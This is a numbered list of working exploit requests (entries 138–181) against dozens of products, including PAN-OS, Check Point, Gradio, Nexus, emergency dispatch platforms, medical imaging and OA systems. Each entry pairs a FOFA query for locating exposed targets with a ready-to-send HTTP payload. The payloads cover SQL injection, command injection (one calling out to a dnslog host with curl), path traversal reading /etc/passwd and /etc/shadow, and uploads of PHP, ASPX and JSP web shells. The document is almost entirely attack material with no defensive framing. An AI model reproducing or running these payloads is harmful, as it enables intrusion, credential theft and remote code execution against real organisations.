User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun Communication Command and Dispatch Platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun Communication Command and Dispatch Platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun Communication Command and Dispatch Platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun Communication Command and Dispatch Management Platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the cached file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier Fire Rescue Operations Dispatch Platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical imaging PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan/Anxiaoyi (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexfileupload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
